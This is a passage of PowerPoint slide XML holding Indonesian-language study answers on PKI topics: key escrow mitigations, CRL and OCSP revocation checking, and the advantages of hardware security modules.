              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memaksa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> escrow provider </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyerahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Mitigasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Gunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>multi-party control</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (split key / Shamir’s Secret Sharing).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>strong access control</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan audit trail.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Gunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>hardware security modules (HSM)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>proteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Terapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>regular key rotation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> agar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berlaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lama.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penjelasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Key escrow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> recovery </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kehilangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> trade-off </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jadi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipadukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> governance dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>proteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tambahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>6. What mechanism informs clients about suspended or revoked keys?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Certificate Revocation List (CRL)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> – daftar yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diterbitkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicabut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/suspended.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Online Certificate Status Protocol (OCSP)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mekanisme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> real-time di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menanyakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> status </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CA/OCSP responder.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penjelasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>CRL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berupa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diunduh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkala</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> → </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lambat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efisien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>OCSP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> modern, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> status </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> per request → </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hemat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> bandwidth. Browser modern </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>OCSP stapling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>7. You are providing consultancy to a firm to help them implement smart card authentication to premises networks and cloud services. What are the main advantages of using an HSM over server-based key and certificate management services?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Hardware Security Module (HSM)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keuntungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibanding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>yaitu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Stronger Key Protection:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>privat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pernah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keluar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> HSM.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> malware/insider </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terproteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Tamper Resistance:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>HSM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> anti-tamper (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghapus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibongkar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paksa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bergantung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada software security.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Compliance &amp; Certification:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>HSM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memenuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>FIPS 140-2/3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Common Criteria</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
